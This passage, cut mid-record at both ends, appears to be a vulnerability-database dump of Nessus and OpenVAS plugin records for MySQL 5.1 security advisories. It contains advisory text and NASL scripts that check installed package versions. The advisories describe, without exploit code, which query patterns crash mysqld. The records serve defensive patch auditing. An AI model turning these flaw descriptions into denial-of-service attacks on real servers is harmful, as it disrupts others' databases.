"CVE-2010-3679", "CVE-2010-3836", "CVE-2010-3683", "CVE-2010-3677", "CVE-2010-3838"], "modified": "2019-01-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:mysql-bench", "p-cpe:/a:redhat:enterprise_linux:mysql-debuginfo", "p-cpe:/a:redhat:enterprise_linux:mysql-devel", "p-cpe:/a:redhat:enterprise_linux:mysql-embedded-devel", "p-cpe:/a:redhat:enterprise_linux:mysql-embedded", "p-cpe:/a:redhat:enterprise_linux:mysql-server", "p-cpe:/a:redhat:enterprise_linux:mysql-test", "p-cpe:/a:redhat:enterprise_linux:mysql-libs", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.0", "p-cpe:/a:redhat:enterprise_linux:mysql"], "id": "REDHAT-RHSA-2011-0164.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=51571", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:0164. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51571);\n script_version (\"1.14\");\n script_cvs_date(\"Date: 2019/01/02 16:37:55\");\n\n script_cve_id(\"CVE-2010-3677\", \"CVE-2010-3678\", \"CVE-2010-3679\", \"CVE-2010-3680\", \"CVE-2010-3681\", \"CVE-2010-3682\", \"CVE-2010-3683\", \"CVE-2010-3833\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3838\", \"CVE-2010-3839\", \"CVE-2010-3840\");\n script_bugtraq_id(42596, 42598, 42599, 42625, 42633, 42638, 42646, 43676);\n script_xref(name:\"RHSA\", value:\"2011:0164\");\n\n script_name(english:\"RHEL 6 : mysql (RHSA-2011:0164)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated mysql packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists\nof the MySQL server daemon (mysqld) and many client programs and\nlibraries.\n\nThe MySQL PolyFromWKB() function did not sanity check Well-Known\nBinary (WKB) data, which could allow a remote, authenticated attacker\nto crash mysqld. (CVE-2010-3840)\n\nA flaw in the way MySQL processed certain JOIN queries could allow a\nremote, authenticated attacker to cause excessive CPU use (up to\n100%), if a stored procedure contained JOIN queries, and that\nprocedure was executed twice in sequence. (CVE-2010-3839)\n\nA flaw in the way MySQL processed queries that provide a mixture of\nnumeric and longblob data types to the LEAST or GREATEST function,\ncould allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3838)\n\nA flaw in the way MySQL processed PREPARE statements containing both\nGROUP_CONCAT and the WITH ROLLUP modifier could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3837)\n\nMySQL did not properly pre-evaluate LIKE arguments in view prepare\nmode, possibly allowing a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3836)\n\nA flaw in the way MySQL processed statements that assign a value to a\nuser-defined variable and that also contain a logical value evaluation\ncould allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3835)\n\nA flaw in the way MySQL evaluated the arguments of extreme-value\nfunctions, such as LEAST and GREATEST, could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3833)\n\nA flaw in the way MySQL handled LOAD DATA INFILE requests allowed\nMySQL to send OK packets even when there were errors. (CVE-2010-3683)\n\nA flaw in the way MySQL processed EXPLAIN statements for some complex\nSELECT queries could allow a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3682)\n\nA flaw in the way MySQL processed certain alternating READ requests\nprovided by HANDLER statements could allow a remote, authenticated\nattacker to crash mysqld. (CVE-2010-3681)\n\nA flaw in the way MySQL processed CREATE TEMPORARY TABLE statements\nthat define NULL columns when using the InnoDB storage engine, could\nallow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3680)\n\nA flaw in the way MySQL processed certain values provided to the\nBINLOG statement caused MySQL to read unassigned memory. A remote,\nauthenticated attacker could possibly use this flaw to crash mysqld.\n(CVE-2010-3679)\n\nA flaw in the way MySQL processed SQL queries containing IN or CASE\nstatements, when a NULL argument was provided as one of the arguments\nto the query, could allow a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3678)\n\nA flaw in the way MySQL processed JOIN queries that attempt to\nretrieve data from a unique SET column could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3677)\n\nNote: CVE-2010-3840, CVE-2010-3838, CVE-2010-3837, CVE-2010-3835,\nCVE-2010-3833, CVE-2010-3682, CVE-2010-3681, CVE-2010-3680,\nCVE-2010-3678, and CVE-2010-3677 only cause a temporary denial of\nservice, as mysqld was automatically restarted after each crash.\n\nThese updated packages upgrade MySQL to version 5.1.52. Refer to the\nMySQL release notes for a full list of changes :\n\nhttp://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html\n\nAll MySQL users should upgrade to these updated packages, which\ncorrect these issues. After installing this update, the MySQL server\ndaemon (mysqld) will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3677\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3678\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3679\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3680\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3681\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3682\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3683\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3833\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3835\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3836\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3837\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3838\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3839\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3840\"\n );\n # http://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:0164\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql-embedded-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2011:0164\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"mysql-5.1.52-1.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"mysql-5.1.52-1.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mysql-5.1.52-1.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"mysql-bench-5.1.52-1.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"mysql-bench-5.1.52-1.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mysql-bench-5.1.52-1.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"mysql-debuginfo-5.1.52-1.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"mysql-devel-5.1.52-1.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"mysql-embedded-5.1.52-1.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"mysql-embedded-devel-5.1.52-1.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"mysql-libs-5.1.52-1.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"mysql-server-5.1.52-1.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"mysql-server-5.1.52-1.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mysql-server-5.1.52-1.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"mysql-test-5.1.52-1.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"mysql-test-5.1.52-1.el6_0.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mysql-test-5.1.52-1.el6_0.1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mysql / mysql-bench / mysql-debuginfo / mysql-devel / etc\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:14:23", "references": ["http://www.nessus.org/u?b8d8afaf", "https://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html"], "pluginID": "60940", "description": "The MySQL PolyFromWKB() function did not sanity check Well-Known\nBinary (WKB) data, which could allow a remote, authenticated attacker\nto crash mysqld. (CVE-2010-3840)\n\nA flaw in the way MySQL processed certain JOIN queries could allow a\nremote, authenticated attacker to cause excessive CPU use (up to\n100%), if a stored procedure contained JOIN queries, and that\nprocedure was executed twice in sequence. (CVE-2010-3839)\n\nA flaw in the way MySQL processed queries that provide a mixture of\nnumeric and longblob data types to the LEAST or GREATEST function,\ncould allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3838)\n\nA flaw in the way MySQL processed PREPARE statements containing both\nGROUP_CONCAT and the WITH ROLLUP modifier could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3837)\n\nMySQL did not properly pre-evaluate LIKE arguments in view prepare\nmode, possibly allowing a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3836)\n\nA flaw in the way MySQL processed statements that assign a value to a\nuser-defined variable and that also contain a logical value evaluation\ncould allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3835)\n\nA flaw in the way MySQL evaluated the arguments of extreme-value\nfunctions, such as LEAST and GREATEST, could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3833)\n\nA flaw in the way MySQL handled LOAD DATA INFILE requests allowed\nMySQL to send OK packets even when there were errors. (CVE-2010-3683)\n\nA flaw in the way MySQL processed EXPLAIN statements for some complex\nSELECT queries could allow a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3682)\n\nA flaw in the way MySQL processed certain alternating READ requests\nprovided by HANDLER statements could allow a remote, authenticated\nattacker to crash mysqld. (CVE-2010-3681)\n\nA flaw in the way MySQL processed CREATE TEMPORARY TABLE statements\nthat define NULL columns when using the InnoDB storage engine, could\nallow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3680)\n\nA flaw in the way MySQL processed certain values provided to the\nBINLOG statement caused MySQL to read unassigned memory. A remote,\nauthenticated attacker could possibly use this flaw to crash mysqld.\n(CVE-2010-3679)\n\nA flaw in the way MySQL processed SQL queries containing IN or CASE\nstatements, when a NULL argument was provided as one of the arguments\nto the query, could allow a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3678)\n\nA flaw in the way MySQL processed JOIN queries that attempt to\nretrieve data from a unique SET column could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3677)\n\nNote: CVE-2010-3840, CVE-2010-3838, CVE-2010-3837, CVE-2010-3835,\nCVE-2010-3833, CVE-2010-3682, CVE-2010-3681, CVE-2010-3680,\nCVE-2010-3678, and CVE-2010-3677 only cause a temporary denial of\nservice, as mysqld was automatically restarted after each crash.\n\nThese updated packages upgrade MySQL to version 5.1.52. Refer to the\nMySQL release notes for a full list of changes :\n\nhttp://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html\n\nAfter installing this update, the MySQL server daemon (mysqld) will be\nrestarted automatically.", "edition": 7, "reporter": "Tenable", "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : mysql on SL6.x i386/x86_64", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Scientific Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3678", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3679", "CVE-2010-3836", "CVE-2010-3683", "CVE-2010-3677", "CVE-2010-3838"], "modified": "2018-12-31T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20110118_MYSQL_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=60940", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60940);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/12/31 11:35:00\");\n\n script_cve_id(\"CVE-2010-3677\", \"CVE-2010-3678\", \"CVE-2010-3679\", \"CVE-2010-3680\", \"CVE-2010-3681\", \"CVE-2010-3682\", \"CVE-2010-3683\", \"CVE-2010-3833\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3838\", \"CVE-2010-3839\", \"CVE-2010-3840\");\n\n script_name(english:\"Scientific Linux Security Update : mysql on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The MySQL PolyFromWKB() function did not sanity check Well-Known\nBinary (WKB) data, which could allow a remote, authenticated attacker\nto crash mysqld. (CVE-2010-3840)\n\nA flaw in the way MySQL processed certain JOIN queries could allow a\nremote, authenticated attacker to cause excessive CPU use (up to\n100%), if a stored procedure contained JOIN queries, and that\nprocedure was executed twice in sequence. (CVE-2010-3839)\n\nA flaw in the way MySQL processed queries that provide a mixture of\nnumeric and longblob data types to the LEAST or GREATEST function,\ncould allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3838)\n\nA flaw in the way MySQL processed PREPARE statements containing both\nGROUP_CONCAT and the WITH ROLLUP modifier could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3837)\n\nMySQL did not properly pre-evaluate LIKE arguments in view prepare\nmode, possibly allowing a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3836)\n\nA flaw in the way MySQL processed statements that assign a value to a\nuser-defined variable and that also contain a logical value evaluation\ncould allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3835)\n\nA flaw in the way MySQL evaluated the arguments of extreme-value\nfunctions, such as LEAST and GREATEST, could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3833)\n\nA flaw in the way MySQL handled LOAD DATA INFILE requests allowed\nMySQL to send OK packets even when there were errors. (CVE-2010-3683)\n\nA flaw in the way MySQL processed EXPLAIN statements for some complex\nSELECT queries could allow a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3682)\n\nA flaw in the way MySQL processed certain alternating READ requests\nprovided by HANDLER statements could allow a remote, authenticated\nattacker to crash mysqld. (CVE-2010-3681)\n\nA flaw in the way MySQL processed CREATE TEMPORARY TABLE statements\nthat define NULL columns when using the InnoDB storage engine, could\nallow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3680)\n\nA flaw in the way MySQL processed certain values provided to the\nBINLOG statement caused MySQL to read unassigned memory. A remote,\nauthenticated attacker could possibly use this flaw to crash mysqld.\n(CVE-2010-3679)\n\nA flaw in the way MySQL processed SQL queries containing IN or CASE\nstatements, when a NULL argument was provided as one of the arguments\nto the query, could allow a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3678)\n\nA flaw in the way MySQL processed JOIN queries that attempt to\nretrieve data from a unique SET column could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3677)\n\nNote: CVE-2010-3840, CVE-2010-3838, CVE-2010-3837, CVE-2010-3835,\nCVE-2010-3833, CVE-2010-3682, CVE-2010-3681, CVE-2010-3680,\nCVE-2010-3678, and CVE-2010-3677 only cause a temporary denial of\nservice, as mysqld was automatically restarted after each crash.\n\nThese updated packages upgrade MySQL to version 5.1.52. Refer to the\nMySQL release notes for a full list of changes :\n\nhttp://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html\n\nAfter installing this update, the MySQL server daemon (mysqld) will be\nrestarted automatically.\"\n );\n # http://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1103&L=scientific-linux-errata&T=0&P=4794\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b8d8afaf\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"mysql-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"mysql-bench-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"mysql-devel-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"mysql-embedded-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"mysql-embedded-devel-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"mysql-libs-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"mysql-server-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"mysql-test-5.1.52-1.el6_0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-12-20T13:17:46", "references": ["2010:0825-01", "https://www.redhat.com/archives/rhsa-announce/2010-November/msg00003.html"], "pluginID": "870356", "description": "Check for the Version of mysql", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-11-16T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "RedHat Update for mysql RHSA-2010:0825-01", "type": "openvas", "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3836", "CVE-2010-3677", "CVE-2010-3838"], "modified": "2017-12-19T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=870356", "id": "OPENVAS:870356", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for mysql RHSA-2010:0825-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"MySQL is a multi-user, multi-threaded SQL database server. It consists of\n the MySQL server daemon (mysqld) and many client programs and libraries.\n\n It was found that the MySQL PolyFromWKB() function did not sanity check\n Well-Known Binary (WKB) data. A remote, authenticated attacker could use\n specially-crafted WKB data to crash mysqld. This issue only caused a\n temporary denial of service, as mysqld was automatically restarted after\n the crash. (CVE-2010-3840)\n \n A flaw was found in the way MySQL processed certain JOIN queries. If a\n stored procedure contained JOIN queries, and that procedure was executed\n twice in sequence, it could cause an infinite loop, leading to excessive\n CPU use (up to 100%). A remote, authenticated attacker could use this flaw\n to cause a denial of service. (CVE-2010-3839)\n \n A flaw was found in the way MySQL processed queries that provide a mixture\n of numeric and longblob data types to the LEAST or GREATEST function. A\n remote, authenticated attacker could use this flaw to crash mysqld. This\n issue only caused a temporary denial of service, as mysqld was\n automatically restarted after the crash. (CVE-2010-3838)\n \n A flaw was found in the way MySQL processed PREPARE statements containing\n both GROUP_CONCAT and the WITH ROLLUP modifier. A remote, authenticated\n attacker could use this flaw to crash mysqld. This issue only caused a\n temporary denial of service, as mysqld was automatically restarted after\n the crash. (CVE-2010-3837)\n \n It was found that MySQL did not properly pre-evaluate LIKE arguments in\n view prepare mode. A remote, authenticated attacker could possibly use this\n flaw to crash mysqld. (CVE-2010-3836)\n \n A flaw was found in the way MySQL processed statements that assign a value\n to a user-defined variable and that also contain a logical value\n evaluation. A remote, authenticated attacker could use this flaw to crash\n mysqld. This issue only caused a temporary denial of service, as mysqld was\n automatically restarted after the crash. (CVE-2010-3835)\n \n A flaw was found in the way MySQL evaluated the arguments of extreme-value\n functions, such as LEAST and GREATEST. A remote, authenticated attacker\n could use this flaw to crash mysqld. This issue only caused a temporary\n denial of service, as mysqld was automatically restarted after the crash.\n (CVE-2010-3833)\n \n A flaw was found in the way MySQL processed EXPLAIN statements for some\n complex SELECT queries. A remote, authenticated attacker could use this\n flaw to crash mysqld. This issue only caused a temporary denial of servic ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"mysql on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-November/msg00003.html\");\n script_id(870356);\n script_version(\"$Revision: 8164 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-19 07:30:41 +0100 (Tue, 19 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"RHSA\", value: \"2010:0825-01\");\n script_cve_id(\"CVE-2010-3677\", \"CVE-2010-3680\", \"CVE-2010-3681\", \"CVE-2010-3682\", \"CVE-2010-3833\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3838\", \"CVE-2010-3839\", 